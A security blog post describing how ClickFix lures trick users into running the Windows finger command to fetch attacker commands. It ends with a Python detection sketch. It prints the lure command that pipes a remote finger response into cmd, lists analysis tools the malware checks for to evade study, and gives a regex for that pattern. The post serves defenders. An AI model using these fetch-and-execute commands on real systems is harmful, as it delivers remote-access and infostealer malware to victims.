ClickFix is so widespread these days that you can find the most exotic things in it. In one campaign, researchers spotted an original malware delivery method: the attackers are using the Finger protocol. You know, the one written in 1971. That’s right: attackers are dusting off ancient tech to deliver modern threats, and it’s working.
When you run the finger command, it connects to TCP port 79 and retrieves information from a remote finger server. In its original form, it returns basic user details. But in the context of ClickFix? It retrieves malicious commands instead.
How ClickFix Abuses Finger
Here’s how this works. A user falls for a ClickFix page—maybe a fake CAPTCHA verification or a document viewer error. They’re told to press Win+R and run a command. The command looks something like this:
cmd /c start "" /min cmd /c "finger [email protected][.]org | cmd"
What happens next is clever. The finger command connects to the attacker’s server and retrieves commands, which are then piped directly through cmd.exe and executed. No PowerShell needed. No suspicious downloads. Just a simple protocol from 1971 doing the attacker’s bidding.
In the campaign researchers observed, the retrieved commands:
- Created a randomly named path
- Copied curl.exe to a random filename
- Used the renamed curl to download a zip archive disguised as a PDF
- Extracted a Python malware package
- Executed it using pythonw.exe
All while displaying a fake “Verify you are human” prompt to keep the victim thinking everything’s fine. The final payload? Likely an infostealer, based on related batch files researchers found.
Advanced Variants
But wait, it gets better. Some variants are more sophisticated. One campaign uses `finger [email protected] | cmd` to retrieve commands that first check for dozens of malware analysis tools. If it finds any of these, it exits immediately:
- Filemon, Regmon, Procexp, Procmon
- Tcpview, Vmmap, Portmon
- Wireshark, Fiddler
- IDA, x64dbg, OllyDbg, ImmunityDebugger
- ProcessHacker, ProcessLasso
- And more
If no analysis tools are detected, it proceeds to download a zip archive disguised as a PDF. But instead of a Python package, this one extracts NetSupport Manager RAT—a full remote access trojan. Then it configures a scheduled task to launch the malware when the user logs in. Persistent access, delivered via a protocol from 1971. You’ve got to respect the creativity, even if you hate the intent.
Why This Works: The LOLBIN Advantage
Finger is a legitimate Windows command. It’s a LOLBIN (Living Off The Land Binary)—a legitimate tool that attackers abuse for malicious purposes. Security tools don’t flag it because it’s supposed to be there. It’s not malware. It’s just a command doing what it was designed to do, except the attacker controls what information it retrieves.
This isn’t even the first time finger has been abused. Researchers warned about this back in 2020. But now it’s part of the ClickFix toolkit, and it’s working because users are falling for the social engineering.
A Real Victim’s Story
One Reddit user shared their experience after falling for this exact attack. They were in a rush, saw a “verify you are human” prompt, and ran the command. After realizing what happened, they panicked and asked for help. McAfee+ showed no threats, which made them even more worried.
This is the reality of ClickFix attacks. Users are in a hurry. They see something that looks legitimate. They follow instructions. And by the time they realize something’s wrong, the damage might already be done. The finger command executes, retrieves the malicious script, and the payload is delivered—all while the user thinks they’re just verifying they’re human.
This is what ClickFix has become. It’s not just one attack method—it’s an entire ecosystem of social engineering techniques. Attackers are getting creative, using everything from modern AI-powered pages to protocols from 1971. They’re adapting faster than defenses can keep up.
The fact that a 54-year-old protocol is being used in modern attacks tells you something about the state of cybersecurity. Attackers will use whatever works. If it’s old, obscure, and still functional, they’ll abuse it. And users will fall for it because they’re human, they’re in a hurry, and they trust what looks legitimate.
So protect your users. Block port 79. Monitor for finger.exe. Deploy layered defenses. And remember: if you couldn’t teach them not to stick their fingers in electrical outlets, you’re definitely not going to teach them not to run commands from suspicious websites. The best you can do is catch the attacks when they happen.
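One way to implement the finger.exe monitoring suggested above, together with a check for the renamed curl.exe copy from the infection chain, is sketched below. This is an added example, not code from the original article or from the researchers. It assumes process-creation telemetry with Sysmon Event ID 1 style fields (Image, OriginalFileName, CommandLine); the sample events, hosts and paths are constructed placeholders.

```python
import ntpath
import re

# Constructed process-creation records; not indicators from the campaign.
SAMPLE_EVENTS = [
    # The shell that the Win+R command starts: the pipe is visible only here.
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": 'cmd /c "finger user@finger.example.invalid | cmd"'},
    # finger.exe itself: its own command line never contains the pipe.
    {"Image": r"C:\Windows\System32\finger.exe", "OriginalFileName": "finger.exe",
     "CommandLine": "finger user@finger.example.invalid"},
    # curl.exe copied to a random name: the version resource still says curl.exe.
    {"Image": r"C:\Users\a\AppData\Local\kq3x\wz81.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"wz81.exe -o doc.pdf https://files.example.invalid/doc.pdf"},
    # Benign baseline: curl.exe running under its real name.
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://example.invalid/"},
]

# A remote finger lookup (user@host) whose output is piped into a shell.
PIPE_TO_SHELL = re.compile(
    r"\bfinger(?:\.exe)?\s+[^|]*@[^|]*\|\s*(?:cmd|powershell|pwsh)\b", re.I)

def classify(event):
    """Return the sorted names of the rules a process-creation event matches."""
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    hits = set()
    # finger.exe is rarely used on endpoints, so any execution is worth a look;
    # matching OriginalFileName as well catches a renamed copy.
    if "finger.exe" in (image, original):
        hits.add("finger_execution")
    if PIPE_TO_SHELL.search(event.get("CommandLine", "")):
        hits.add("finger_piped_to_shell")
    if original == "curl.exe" and image != "curl.exe":
        hits.add("renamed_curl")
    return sorted(hits)

def triage(events):
    """Return (image, rules) for every event that matched at least one rule."""
    return [(e["Image"], classify(e)) for e in events if classify(e)]

if __name__ == "__main__":
    for image, rules in triage(SAMPLE_EVENTS):
        print(image, rules)
```

The pipe-to-shell rule has to run against the parent shell's command line, because finger.exe's own process event only shows the lookup target.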
ClickFix is so widespread that attackers are using the most exotic delivery methods. The Finger protocol from 1971 is just the latest example. It’s a simple, legitimate command that retrieves information—except now attackers control what information it retrieves, and that information is malicious commands.
Users will fall for these attacks. They’re human. They’re in a hurry. They see something that looks legitimate and they follow instructions. The best defense isn’t trying to teach them not to make mistakes—it’s building security controls that assume they will and catching attacks before they succeed.


